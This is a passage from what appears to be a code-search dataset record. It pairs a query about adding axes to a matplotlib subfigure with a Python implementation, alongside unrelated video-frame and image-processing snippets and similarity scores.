skullPoints)\n\n with open(srcDir + \"/\" + str(userId) + '_' + srcName + '.json', 'w') as cache: \n metaDataDict[\"video_id\"] = video_id\n json.dump(metaDataDict, cache)", "def preprocess(self, frame: np.ndarray) -> torch.TensorType:\n tensor = cv.resize(frame, (self.IMGSZ, self.IMGSZ)) \n tensor = tensor.transpose(2, 0, 1)\n tensor = torch.from_numpy(tensor)\n tensor = torch.unsqueeze(tensor, 0)\n tensor = tensor.half() if self.half else tensor.float()\n tensor = tensor / 255.0\n tensor = tensor.to(self.device)\n\n return tensor", "def process(self):\n frame_count = 0\n size = self.frame.size\n while True:\n try:\n for i in range(parallel.BUFFER_LENGTH):\n offset = i * size;\n self.manager.image[offset : offset + size] = self.frame.ravel()\n self.ret, self.frame = self.capture.read()\n if not self.ret:\n self.clear_buffer(offset=offset + size + 1)\n raise StopIteration\n if DEBUG_LEVEL > 2:\n cv.imshow(self.name, self.frame)\n frame_count += 1\n key = cv.waitKey(self.toggle)\n if key is 27:\n raise StopIteration\n return\n elif key is 32:\n self.toggle ^= 1\n self.manager.detect()\n self.barrier.wait()\n except StopIteration:\n # Handle dangling frames in buffer and return gracefully\n self.manager.detect()\n self.barrier.wait()\n self.cleanup()\n try:\n # Handle rangequits in Phase 1\n for rv in self.variables:\n for event in rv['events']:\n if event['event_subtype'] == \"Finish\":\n return self.variables\n return None\n except:\n # Phase 0 -- no handling\n return self.variables\n except:\n # Any other exception is bad!\n return None", "def createPipeline(self, w):\n\n # code will make the ximagesink output in the specified window\n def set_xid(window):\n gtk.gdk.threads_enter()\n sink.set_xwindow_id(window.window.xid)\n sink.expose()\n gtk.gdk.threads_leave()\n\n # this code receives the messages from the pipeline. if we\n # need to set X11 id, then we call set_xid\n def bus_handler(unused_bus, message):\n if message.type == gst.MESSAGE_ELEMENT:\n if message.structure.get_name() == 'prepare-xwindow-id':\n set_xid(w)\n return gst.BUS_PASS\n\n # create our pipeline, and connect our bus_handler\n self.pipeline = gst.Pipeline()\n bus = self.pipeline.get_bus()\n bus.set_sync_handler(bus_handler)\n\n sink = gst.element_factory_make(\"ximagesink\", \"sink\")\n sink.set_property(\"force-aspect-ratio\", True)\n sink.set_property(\"handle-expose\", True)\n scale = gst.element_factory_make(\"videoscale\", \"scale\")\n cspace = gst.element_factory_make(\"ffmpegcolorspace\", \"cspace\")\n\n # our pipeline looks like this: ... ! cspace ! scale ! sink\n self.pipeline.add(cspace, scale, sink)\n scale.link(sink)\n cspace.link(scale)\n return (self.pipeline, cspace)", "def convertFrame(self):\n try:\n height,width=self.currentFrame.shape[:2]\n img=QtGui.QImage(self.currentFrame,\n width,\n height,\n QtGui.QImage.Format_RGB888)\n img=QtGui.QPixmap.fromImage(img)\n self.previousFrame = self.currentFrame\n return img\n except:\n return None", "def new_image_callback(self, new_image_msg):\n self.process_new_frame(\n self.cv_bridge.imgmsg_to_cv2(\n new_image_msg,\n desired_encoding=\"bgr8\"\n )\n )", "def create_final_image(full_frame):\n quad_a = full_frame[0, :, :]\n quad_b = full_frame[1, :, :]\n quad_c = full_frame[2, :, :]\n quad_d = full_frame[3, :, :]\n uv_ccd = np.concatenate((quad_d, np.fliplr(quad_c)),\n axis=1)\n visible_ccd = np.concatenate((np.flipud(quad_a), np.rot90(quad_b, 2)),\n axis=1)\n processed_image = np.concatenate((uv_ccd, visible_ccd), axis=0)\n return processed_image", "def add_image_to_frame_list(self,startFrame, endFrame, imageName): \n for i in range(startFrame-1, endFrame-1):\n try:\n # image = imageio.imread(imageName)\n im = Image.open(imageName)\n im = im.resize((720, 720))\n self.frame_list.append(im)\n # self.frame_list.append(im)\n\n except:\n print (imageName, \" not found.\")\n # BufferedImage bi= new BufferedImage(320,240,BufferedImage.TYPE_BYTE_GRAY);\n im=self.blank\n self.frame_list.append(im)", "def process(\n self,\n image: np.array\n ) -> np.array:\n pass", "def annotated_frame(self, original_frame):\n frame = original_frame.copy()\n\n if self.pupils_located:\n color = (0, 255, 0)\n x_left, y_left = self.pupil_left_coords()\n x_right, y_right = self.pupil_right_coords()\n cv2.line(frame, (x_left - 5, y_left), (x_left + 5, y_left), color)\n cv2.line(frame, (x_left, y_left - 5), (x_left, y_left + 5), color)\n cv2.line(frame, (x_right - 5, y_right), (x_right + 5, y_right), color)\n cv2.line(frame, (x_right, y_right - 5), (x_right, y_right + 5), color)\n\n return frame", "def NextFrame(self, event):\n buffer = self.GetDataBuffer()\n if buffer is not None:\n # Update bitmap widget with new image frame:\n self.bitmap.CopyFromBuffer(buffer)\n # Refresh panel to draw image into bitmap:\n self.Refresh()\n pass", "def run(input_video_file, output_video_file):\n print(\"Debut de la transformation du format de la video\")\n #récupération de la vidéo\n video = cv2.VideoCapture(input_video_file)\n #fps de la vidéo\n fps = video.get(cv2.CAP_PROP_FPS)\n #largeur des images de la vidéo\n width_video = int(video.get(cv2.CAP_PROP_FRAME_WIDTH))\n #hauteur des images de la vidéo\n height_video = int(video.get(cv2.CAP_PROP_FRAME_HEIGHT))\n #nombre d'images dans la vidéo\n frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))\n #durée de la vidéo\n duration = frame_count/fps\n #nouvelle durée de la vidéo (on arrondi)\n new_duration = math.floor(duration)\n #nouveau fps de la vidéo\n new_fps = float(round(fps))\n #appliquer le nouveau fps\n video.set(cv2.CAP_PROP_FPS,new_fps)\n #appliquer la nouvelle durée\n print(new_duration)\n print(new_fps)\n print(new_duration*new_fps)\n new_frame_count = new_duration*new_fps\n video.set(cv2.CAP_PROP_FRAME_COUNT,new_duration*new_fps)\n #déffinition du format de la vidéo en sortie\n video_out = cv2.VideoWriter(output_video_file,0x7634706d,new_fps,(width_video,height_video),True)\n \n count = 0\n #ouverture de la vidéo\n while(video.isOpened()):\n #lecture image par image\n ret, frame = video.read()\n if ret==True:\n\n #ecriture de l'image dans la vidéo en sortie\n video_out.write(frame)\n count = count + 1\n \n if (count > (new_frame_count-1)):\n # Libérer la vidéo\n video.release()\n break\n else:\n break\n\n print(\"fin de la transformation\")\n #fermer les vidéos\n video.release()\n video_out.release()", "def player_processframe_event(self, frame):\n\t\tpaths = self._panel_path.value.datasets\n\t\tareas = self._panel_area.value.datasets\n\t\tcolors = self._panel_colors.value.datasets\n\t\timages = self._panel_imgs.value.images\n\n\t\t# check if should use the current frame or an image selected to background\n\t\tframe = frame if len(images)!=1 else images[0].image.copy()\n\t\tindex = self._player.video_index-1\n\t\n\t\tfor path in paths:\n\t\t\t# draw the path if the option is selected\n\t\t\tif self._drawpath.value: path.draw_path(frame, None, index)\n\n\t\t\tarea = self.get_object_area(path, areas, index)\n\t\t\tif area is not None:\n\t\t\t\tcolor \t = self.get_object_color(path, colors, index)\n\t\t\t\tposition = path.get_position(index)\n\t\t\t\t\n\t\t\t\tif position is not None and area is not None and color is not None:\n\t\t\t\t\tradius = int(round(math.sqrt(area/math.pi)))\t\t\t\t\n\t\t\t\t\tcv2.circle(frame, position, radius, color, -1)\n\n\t\tself.draw_events(index, frame)\n\n\t\treturn frame", "def annotated_frame(self):\n frame = self.frame.copy()\n if self.pupils_located:\n color = (0, 255, 0)\n x_left, y_left = self.pupil_left_coords()\n x_right, y_right = self.pupil_right_coords()\n # cv2.line(frame, (x_left - 5, y_left), (x_left + 5, y_left), color)\n # cv2.line(frame, (x_left, y_left - 5), (x_left, y_left + 5), color)\n # cv2.line(frame, (x_right - 5, y_right), (x_right + 5, y_right), color)\n # cv2.line(frame, (x_right, y_right - 5), (x_right, y_right + 5), color)\n return frame", "def registerDepthFrame(self, frame):\n frame = cv2.warpAffine(frame, self.depth2rgb_affine,\n (frame.shape[1], frame.shape[0]))\n return frame", "def visualize_flow(src, flow_comp_func):\n\n # Flag specifying whether this is the first frame or not.\n first_frame = True\n \n # Initialize video stream.\n video_capture = cv2.VideoCapture(src)\n if not video_capture.isOpened():\n raise RuntimeError(\"Error opening video stream.\")\n \n # Previous frame buffer and results array.\n prev = None\n res = []\n \n # Set frame counter.\n count = 0\n FRAME_LIM = 200\n \n # While there is video and while below frame index limit.\n while video_capture.isOpened() and count < FRAME_LIM:\n\n # Increment frame count.\n count += 1\n print(\"Processing frame {0}/{1}\".format(count, FRAME_LIM))\n\n # Get next frame.\n ret, frame = video_capture.read()\n if ret:\n frame_gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n \n # If first frame ...\n if first_frame:\n \n # Set frame as previous frame.\n prev = frame_gray\n prev_original = frame\n \n # Set first frame flag to false.\n first_frame = False\n\n else:\n\n # Compute flow using current frame and frame\n # in previous buffer.\n u, v = flow_comp_func(prev.astype(float)/255.0, frame_gray.astype(float)/255.0)\n \n\n ### TODO - remove ###\n # import pdb\n # pdb.set_trace()\n # fig2, ((ax2_11, ax2_12), (ax2_21, ax2_22)) = plt.subplots(2, 2)\n # ax2_11.imshow(prev)\n # ax2_12.imshow(frame_gray)\n # show_flow(u, v, ax2_21, type='angle')\n # show_flow(u, v, ax2_22, type='field', set_aspect=True)\n # fig2.suptitle('Horn−Schunck Optical Flow')\n ######\n\n # Add optical flow visualization to image in prev buffer.\n vis_nxt = superimpose_field(u, v, prev_original)\n\n prev = frame_gray\n prev_original = frame\n\n # Store visualization in results buffer\n res.append(vis_nxt)\n\n else:\n break\n \n # Release stream.\n video_capture.release()\n\n # Create gif file from images.\n imageio.mimsave('roundabout_hs.gif', res)", "def motion_extraction():\n # iterate through frames\n global frame_height, frame_width\n global limb_coords, init_coords\n frame_count = 0\n has_frames, frame = capture.read()\n\n while has_frames:\n img_out = frame.copy()\n img_out = insert_padding(img_out, 14*14, 12*14)\n\n if frame_count == 0:\n # change global values of height and width\n frame_height = frame_height + 14*14*2\n frame_width = frame_width + 12*14*2\n get_start_positions(img_out)\n img_out2 = segment_red(img_out, 200, 130)\n #erode(img_out2, 4, 6)\n remove_artifacts(img_out2)\n #enhance_contrast(img_out2)\n\n if frame_count > 0:\n get_motion(prev_frame, img_out2, frame_count)\n\n prev_frame = img_out2.copy()\n frame_count += 1\n has_frames, frame = capture.read()", "def gen(camera):\n #time.sleep(3)\n while True:\n frame = camera.get_frame()\n yield (b'--frame\\r\\n'\n b'Content-Type: image/jpeg\\r\\n\\r\\n' + frame + b'\\r\\n')", "def augment(self, image):\n pass", "def splitTransform(self):\n\t\t#path_merge = \"transform\"\n\t\t#path_train = \"transform/data/\"\n\t\t#path_label = \"transform/label/\"\n\t\tpath_merge = \"train/merge\"\n\t\tpath_train = \"train/image\"\n\t\tpath_label = \"train/label\"\n\t\ttrain_imgs = glob.glob(path_merge+\"/*.\"+self.img_type)\n\t\tfor imgname in train_imgs:\n\t\t\tmidname = imgname[imgname.rindex(\"/\")+1:imgname.rindex(\".\"+self.img_type)]\n\t\t\timg = cv2.imread(imgname)\n\t\t\timg_train = img[:,:,2]#cv2 read image rgb->bgr\n\t\t\timg_label = img[:,:,0]\n\t\t\tcv2.imwrite(path_train+midname+\".\"+self.img_type,img_train)\n\t\t\tcv2.imwrite(path_label+midname+\".\"+self.img_type,img_label)", "def preprocess_output(self, face_box, frame):\n if face_box is None or frame is None or frame.size < 1:\n return None, None\n else:\n face_box = helpers.fit(face_box, frame)\n face_img = helpers.crop(frame, face_box)\n return face_img, face_box", "def tagVideo(modelpath, videopath, outputPath=None): \n model = get_model_instance_segmentation(3)\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # model.load_state_dict(torch.load(modelpath, map_location=device), strict=False)\n model.load_state_dict(torch.load(modelpath, map_location=device))\n model = model.to(device)\n model.eval()\n\n \n data_transform = transforms.Compose([\n ToPILImage(),\n transforms.ToTensor(), \n ])\n\n\n if outputPath:\n writer = FFmpegWriter(str(outputPath))\n \n font = cv2.FONT_HERSHEY_SIMPLEX\n cv2.namedWindow('main', cv2.WINDOW_NORMAL)\n labels = ['No mask', 'Mask']\n labelColor = [(10, 0, 255), (10, 255, 0)]\n img_count = 0\n outputDir = os.path.dirname(os.path.realpath(outputPath))\n frame_count = 0\n boundingBoxes = []\n for frame in vreader(str(videopath)):\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n print('Frame:', frame_count)\n\n if frame_count%30==0:\n frameTensor = data_transform(frame)\n frameTensor = torch.unsqueeze(frameTensor, 0).to(device)\n output = model(frameTensor)\n boundingBoxes = plot_image_new(frame, frameTensor[0], output[0]) \n \n if len(boundingBoxes)>0:\n for bb in boundingBoxes:\n cv2.rectangle(frame,\n (bb[0], bb[1]),\n (bb[2], bb[3]),\n (54, 66, 227),\n thickness=2)\n\n cv2.imshow('main', frame)\n if outputPath:\n writer.writeFrame(cv2.cvtColor(frame, cv2.COLOR_RGB2BGR))\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n frame_count += 1\n if outputPath:\n writer.close()\n cv2.destroyAllWindows()", "def convertFrame(self):\r\n try:\r\n height, width = self.currentFrame.shape[:2]\r\n img = QtGui.QImage(self.currentFrame,\r\n width,\r\n height,\r\n QtGui.QImage.Format_RGB888)\r\n img = QtGui.QPixmap.fromImage(img)\r\n self.previousFrame = self.currentFrame\r\n return img\r\n except:\r\n return None", "def frames(self):\n while True:\n ret, frame = self.classification()\n if ret == True:\n yield cv2.imencode('.jpg', frame)[1].tobytes()\n else:\n break", "def step(self, frame):\n if not self._stack:\n # Fill stack with copies of first frame if empty.\n self._stack.extend([frame] * (self._num_frames - 1))\n self._stack.append(frame)\n # Match BCAgent's stacking along axis 2.\n stacked_frames = np.stack(self._stack, axis=2)\n\n if not self._flatten:\n return stacked_frames\n else:\n new_shape = stacked_frames.shape[:-2] + (-1,)\n return stacked_frames.reshape(*new_shape)", "def pipeline():\n\n test_pipeline = (Pipeline()\n .init_variable('current_loss')\n .init_model('model', C('model_class'),\n 'dynamic', C('model_config'))\n .to_array(dtype='float32')\n .train_model('model',\n inputs=B('images'),\n targets=B('labels'),\n outputs='loss',\n save_to=V('current_loss'))\n )\n return test_pipeline", "def apply(self, image):\n\n bgr = cv2.cvtColor(frame, cv2.COLOR_RGB2BGR)\n\n # Convert to float image\n float_im = bgr.copy().astype('float32') / 255\n blurred = cv2.GaussianBlur(float_im, ksize=(9, 9), sigmaX=1, sigmaY=9)\n cplanes = colors.bgr2cpaces(blurred)\n lanes, py, pw = finder.find_lane_pixels(cplanes, self.pfilter, gamma=0.4)\n\n binary = lanes\n\n # Find lanes and fit curves\n if not self.curve:\n self.sw.find(binary)\n self.curve= CurveSearch(self.sw.left_fit, self.sw.right_fit,\n image_size=self.warped_image_size, margin=20)\n lane = self.sw.visualize_lane()\n curve_rad = self.measure_curvature(self.sw.left_fit, self.sw.right_fit)\n offset = self.measure_offset(self.sw.left_fit, self.sw.right_fit)\n else:\n self.curve.find(binary)\n lane = self.curve.visualize_lane()\n curve_rad = self.measure_curvature(self.curve.left_fit, self.curve.right_fit)\n offset = self.measure_offset(self.curve.left_fit, self.curve.right_fit)\n\n non_warped_lane = self.warp_inverse(lane)\n\n result = cv2.addWeighted(image, 1, non_warped_lane, 0.3, 0)\n cv2.putText(result, \"Curve Radius: {:.0f}m\".format(curve_rad), (50,50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255))\n cv2.putText(result, \"Off Center: {:.2f}m\".format(offset), (50, 100),\n cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255))\n\n return result", "def post_processing(frame,\r\n enable_spatial=True,\r\n enable_temporal=True,\r\n enable_hole=True,\r\n spatial_params=[(rs.option.filter_magnitude, 5), \r\n (rs.option.filter_smooth_alpha, 1),\r\n (rs.option.filter_smooth_delta, 50),\r\n (rs.option.holes_fill, 3)],\r\n temporal_params=[],\r\n hole_params=[]):\r\n # Filters and settings\r\n depth_to_disparity = rs.disparity_transform(True)\r\n disparity_to_depth = rs.disparity_transform(False)\r\n\r\n # Depth to disparity before spatial and temporal filters\r\n frame = depth_to_disparity.process(frame)\r\n\r\n # Spatial filter\r\n if enable_spatial:\r\n # Settings\r\n spatial = rs.spatial_filter()\r\n for spatial_param in spatial_params:\r\n spatial.set_option(spatial_param[0], spatial_param[1])\r\n\r\n # Apply on frame\r\n frame = spatial.process(frame)\r\n\r\n # Temporal filter\r\n if enable_temporal:\r\n temporal = rs.temporal_filter()\r\n for temporal_param in temporal_params:\r\n temporal.set_option(temporal_param[0], temporal_param[1])\r\n frame = temporal.process(frame)\r\n\r\n # Back to depth\r\n frame = disparity_to_depth.process(frame)\r\n\r\n # Hole filling\r\n if enable_hole:\r\n hole_filling = rs.hole_filling_filter()\r\n for hole_param in hole_params:\r\n hole_filling.set_option(hole_param[0], hole_param[1])\r\n frame = hole_filling.process(frame)\r\n\r\n return frame", "def camframes(tree, cam_frame):\n campath = '.PIMAX3'\n cam_frame = cam_frame + 1\n AddNodeWithTag(tree, campath + ':FRAME_' + str(cam_frame), 'NUMERIC',\n 'PIMAX_FRAME' + str(cam_frame))\n AddNumericWithUnit(tree, campath + '.FRAME_' + str(cam_frame) +\n ':EXPOSURE', 'EXPOSURE_PFRAME' + str(cam_frame), 's')\n AddNumericWithUnit(tree, campath + '.FRAME_' + str(cam_frame) + ':DELAY', \n 'GATEDELAY_PFRAME' + str(cam_frame), 's')", "def prepare_test_frames(self, idx):\n results = copy.deepcopy(self.video_infos[idx])\n results['filename_tmpl'] = self.filename_tmpl\n results['modality'] = self.modality\n results['start_index'] = self.start_index\n ann_frame_dir = results['frame_dir'].replace(self.data_prefix,\n self.anno_prefix)\n results['seg_map'] = osp.join(\n ann_frame_dir,\n self.filename_tmpl.format(0).replace('jpg', 'png'))\n return self.pipeline(results)", "def __init__(self, frames=[]):\n # All the frames are converted to TextImage objects.\n self.frames = list(map(TextImage, frames))", "def create_image_pyramids(self):\r\n curr_cam0_img = self.cam0_curr_img_msg.image\r\n # self.curr_cam0_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam0_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam0_pyramid = curr_cam0_img\r\n\r\n curr_cam1_img = self.cam1_curr_img_msg.image\r\n # self.curr_cam1_pyramid = cv2.buildOpticalFlowPyramid(\r\n # curr_cam1_img, self.config.win_size, self.config.pyramid_levels, \r\n # None, cv2.BORDER_REFLECT_101, cv2.BORDER_CONSTANT, False)[1]\r\n self.curr_cam1_pyramid = curr_cam1_img", "def generate():\n global output_frame, lock\n while True:\n with lock:\n if output_frame is None:\n continue\n (flag, encoded_image) = cv2.imencode(\".jpg\", output_frame)\n if not flag:\n continue\n yield (b'--frame\\r\\n' b'Content-Type: image/jpeg\\r\\n\\r\\n' +\n bytearray(encoded_image) + b'\\r\\n')", "def __init__(self, batch_env):\n\n dims = [84, 84]\n nature_transform = lambda o: tf.image.rgb_to_grayscale( # pylint: disable=g-long-lambda\n tf.image.resize_images(o, dims))\n\n super(WarpFrameWrapper, self).__init__(batch_env, transform_observation=(\n nature_transform, dims, tf.float32))", "def make_video(data,\n xdim, ydim, sample_read_rows, sample_read_cols, image_write_rows, image_write_cols,\n directory, filename, fps = 24.0, start_frame = 1, end_frame = None, timestamp = False, fontsize = 30, ts_pos = (0,0), save_raw = False):\n\n #Command to send via the command prompt which specifies the pipe parameters\n # command = ['ffmpeg',\n # '-y', # (optional) overwrite output file if it exists\n # '-f', 'image2pipe',\n # '-vcodec', 'mjpeg', #'mjpeg',\n # '-r', '1',\n # '-r', str(fps), # frames per second\n # '-i', '-', # The input comes from a pipe\n # '-an', # Tells FFMPEG not to expect any audio\n # '-vcodec', 'mpeg4',\n # '-b:v', '5000k',\n # directory + filename + \"/\"+filename+\".mp4\",\n # '-hide_banner',\n # '-loglevel', 'panic']\n\n # Create directories if they don't exist\n if not os.path.exists(os.path.join(directory, filename, 'frames/')):\n os.makedirs(os.path.join(directory, filename, 'frames/'))\n if save_raw and not os.path.exists(os.path.join(directory, filename, 'frames-raw/')):\n os.makedirs(os.path.join(directory, filename, 'frames-raw/'))\n\n if end_frame == None:\n end_frame = data.FrameCount\n\n cm = colormap.get_cmap('viridis')\n\n for i, frame_offset in enumerate(tqdm.tqdm(range(start_frame, end_frame))):\n frame = FrameRead(data, frame_offset)\n frame_image = np.zeros([ydim, xdim], dtype=np.uint8)\n frame_image[image_write_rows, image_write_cols] = frame.frame_data[sample_read_rows, sample_read_cols]\n\n rgb_im = Image.fromarray(cm(frame_image, bytes=True)).convert('RGB')\n rgb_im.save(os.path.join(directory, filename, 'frames/', f'{i}.jpg'), 'JPEG')\n\n if save_raw:\n Image.fromarray(np.uint8(frame.frame_data), mode='L').save(os.path.join(directory, filename, 'frames-raw/', f'{i}.jpg'), 'JPEG')", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None", "def __init__(self, frames):\n self._frames = frames\n self._out = None" ]
[ "0.70714897", "0.68649685", "0.67296463", "0.6588955", "0.65738624", "0.65543723", "0.65153533", "0.6485808", "0.6470367", "0.6332151", "0.62973356", "0.6296194", "0.62521416", "0.62226206", "0.62107146", "0.62040466", "0.6200719", "0.61632663", "0.6150653", "0.6135857", "0.6127615", "0.60991275", "0.60951287", "0.6071355", "0.6058942", "0.6038246", "0.60366976", "0.6033891", "0.6032678", "0.60286", "0.60121095", "0.60083866", "0.60040784", "0.5997873", "0.59942776", "0.5980825", "0.5979414", "0.59780884", "0.5971989", "0.5948592", "0.5947269", "0.5940676", "0.5935967", "0.5925732", "0.5924167", "0.58969826", "0.5879622", "0.586481", "0.58647317", "0.5862134", "0.5857012", "0.5853598", "0.58465886", "0.58115923", "0.5801189", "0.57942224", "0.5794216", "0.5793752", "0.5781946", "0.57803494", "0.5767385", "0.57658327", "0.5762573", "0.57380205", "0.5737169", "0.5726572", "0.572567", "0.5702164", "0.5696915", "0.5684015", "0.5677774", "0.56771034", "0.5676851", "0.5676589", "0.56743956", "0.5666674", "0.5665952", "0.5661595", "0.56594694", "0.5659262", "0.56427985", "0.56411403", "0.56406814", "0.56404936", "0.5637331", "0.56363165", "0.56356007", "0.56328267", "0.5631252", "0.5628585", "0.56212837", "0.56191725", "0.561051", "0.56098974", "0.5605515", "0.560327", "0.560327", "0.560327", "0.560327", "0.560327", "0.560327" ]
0.0
-1
Add axes to a subfigure.
def add_axes(self, i, j, rect, **kw): # Get image offset in figure coordinates irev = self.nrows - 1 - i subfig = self.pad + self.image offset = self.margin.bottom_left + irev*subfig.ybox + j*subfig.xbox + self.pad.bottom_left # Convert image rect to figure rect imstart = Box(rect[0], rect[1]) imshape = Box(rect[2], rect[3]) figstart = (offset + imstart * self.image) / self.fig figshape = imshape * self.image / self.fig figrect = [figstart.x, figstart.y, figshape.x, figshape.y] return self.figure.add_axes(figrect, **kw)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def add_subplot_axes(self, ax, rect, axis_bgcolor=None):\r\n # Modified from\r\n # https://stackoverflow.com/questions/17458580/\r\n box = ax.get_position()\r\n width, height = box.width, box.height\r\n subaxes_box = [(rect[0], rect[1]),\r\n (rect[0] + rect[2], rect[1] + rect[3])]\r\n subaxes_display_coords = ax.transData.transform(subaxes_box)\r\n trans_figure = self.figure.transFigure.inverted()\r\n subaxes_figure_coords = trans_figure.transform(subaxes_display_coords)\r\n x, y = subaxes_figure_coords[0, :]\r\n width, height = (subaxes_figure_coords[1, :] -\r\n subaxes_figure_coords[0, :])\r\n subaxes = self.figure.add_axes(\r\n [x, y, width, height], axis_bgcolor=axis_bgcolor)\r\n x_labelsize = subaxes.get_xticklabels()[0].get_size()\r\n y_labelsize = subaxes.get_yticklabels()[0].get_size()\r\n x_labelsize *= rect[2] ** 0.5\r\n y_labelsize *= rect[3] ** 0.5\r\n subaxes.xaxis.set_tick_params(labelsize=x_labelsize)\r\n subaxes.yaxis.set_tick_params(labelsize=y_labelsize)\r\n return subaxes", "def _InitAxes( self ):\n self.ax = self.fig.add_subplot( 111 )", "def axes_subplots():\n # gerenate data\n x = np.arange(0, 6 * np.pi+0.2, 0.2)\n y_1 = np.cos(x)\n y_2 = np.sin(2*x)\n y_3 = y_1 + y_2\n\n # display multiple\n fig, axs = plt.subplots(3, 1, sharex=True)\n fig.suptitle('Subplots w/ shared axes')\n axs[0].plot(x, y_1)\n axs[1].plot(x, y_2)\n axs[2].plot(x, y_3)\n axs[0].set_ylabel('$y$')\n axs[1].set_ylabel('$y$')\n axs[2].set_ylabel('$y$')\n\n plt.show()\n\n return None", "def setup_axes():\n\taxes = visuals.subplots(1, 2, figsize = (14, 7))\n\taxes[1].set_yscale(\"log\")\n\taxes[0].set_xlabel(\"[Fe/H]\")\n\taxes[0].set_ylabel(\"[Sr/Fe]\")\n\taxes[1].set_xlabel(\"[Sr/Fe]\")\n\taxes[1].set_ylabel(\"Stellar Probability Density\")\n\taxes[0].set_xlim([-2.2, 0.2])\n\taxes[0].set_ylim([-2.4, 0.4])\n\taxes[1].set_xlim([-1.4, 0.4])\n\taxes[1].set_ylim([0.05, 50])\n\treturn axes", "def add_subplot(gridRows, gridCols, plotNo):\n pl.subplot(gridRows, gridCols, plotNo)", "def panel_axes(self, side, **kwargs):\n return self.figure._add_axes_panel(self, side, **kwargs)", "def add_axes(self, ax):\n self._canvas.cd()\n self._axes = ax\n self._canvas.Modified()", "def setup_axes(self):\n fig = plt.figure(1)\n axs = fig.add_subplot(1, 1, 1)\n fig.clf()\n axs = plt.subplots(1, 2)\n ax1 : plt.axis = axs[0]\n ax2 : plt.axis = axs[1]\n fig.canvas.draw()\n \n line1_t, = ax1.plot([], label='train')\n line1_v, = ax1.plot([], label='val')\n\n ax1.set_title('Loss vs Iterations')\n ax1.set_xlabel('Iterations')\n ax1.set_ylabel('Loss')\n ax1.grid(True)\n ax1.autoscale()\n # ax1.legend()\n\n line2_t, = ax2.plot([], label='train')\n line2_v, = ax2.plot([], label='val')\n\n ax2.set_title('Accuracy vs Iterations')\n ax2.set_xlabel('Time')\n ax2.set_ylabel('Percent Accuracy')\n ax2.grid(True)\n ax2.autoscale()\n # ax2.legend()\n\n lines = [line1_t, line1_v, line2_t, line2_v]\n\n return fig, ax1, ax2, lines", "def plot_main(self):\n\n f, axes = plt.subplots(2, 3, figsize=(16, 8))\n self.data_plot(ax=axes[0, 0])\n self.model_plot(ax=axes[0, 1])\n self.normalized_residual_plot(ax=axes[0, 2], v_min=-6, v_max=6)\n self.source_plot(ax=axes[1, 0], convolution=False, deltaPix_source=0.01, numPix=100)\n self.convergence_plot(ax=axes[1, 1], v_max=1)\n self.magnification_plot(ax=axes[1, 2])\n f.tight_layout()\n f.subplots_adjust(left=None, bottom=None, right=None, top=None, wspace=0., hspace=0.05)\n return f, axes", "def init_axes(self):\n plt.switch_backend(\"cairo\")\n fig = plt.figure(figsize=(15,10))\n ax = fig.add_axes([0.05, 0.15, 0.9, 0.80,])\n return (fig, ax)", "def setup_mpl_visuals(self, axes=None) -> None:\n if axes is None:\n axes = self.subplot\n axes.patch.set_facecolor('white')\n axes.set_aspect('equal', 'box')\n axes.set_xlim(-10, 10, auto=True)\n axes.set_ylim(-10, 10, auto=True)\n # TODO: Make XYLim confort to window size/dimensions\n axes.set_xticks([])\n axes.set_yticks([])\n self.figure.subplots_adjust(bottom=0, top=1, left=0, right=1)\n axes.axis('off')", "def subplots(fig_width=None, fig_height=None, *args, **kwargs):\n fig_width, fig_height = get_width_height(fig_width, fig_height, columns=2)\n fig, axes = plt.subplots(figsize=(fig_width, fig_height), *args, **kwargs)\n return fig, axes", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def set_axes(axes, xlabel, ylabel, xlim, ylim, xscale, yscale, legend):\n axes.set_xlabel(xlabel)\n axes.set_ylabel(ylabel)\n axes.set_xscale(xscale)\n axes.set_yscale(yscale)\n axes.set_xlim(xlim)\n axes.set_ylim(ylim)\n if legend:\n axes.legend(legend)\n axes.grid()", "def _setup_figure(self):\n\n plt.figure(1)\n plt.clf()\n\n # Two main axes\n self._tsne_window = plt.axes([0.05, 0.05, 0.4, 0.4])\n self._main_window = plt.axes([0.05, 0.55, 0.4, 0.4])\n\n # Nine sub axes\n self._sub_windows = []\n for row in range(3):\n for col in range(3):\n tt = plt.axes([0.5+0.17*col, 0.75-0.25*row, 0.15, 0.15])\n tt.set_xticks([])\n tt.set_yticks([])\n self._sub_windows.append(tt)\n\n # Register the button click\n self._cid = plt.figure(1).canvas.mpl_connect('button_press_event', self._onclick)\n\n # Text\n plt.figure(1).text(0.6, 0.2, 'Click with 2nd or 3rd mouse button to select image...')\n plt.figure(1).text(0.05, 0.5, 'Click in main image or tSNE plot to find similar cutouts...')\n plt.figure(1).text(0.6, 0.05, 'The tSNE data reduction calculated from data run through {}'.format(self._model_name), fontsize=8)\n\n # Show\n plt.figure(1).show()\n plt.figure(1).canvas.draw()", "def add_figure(self,sig,index,title='',xlabel='',ylabel=''):\n self.last_index = index\n ax = self.fig.add_subplot(self.position+index)\n ax.set_title(title)\n ax.set_xlabel(xlabel)\n 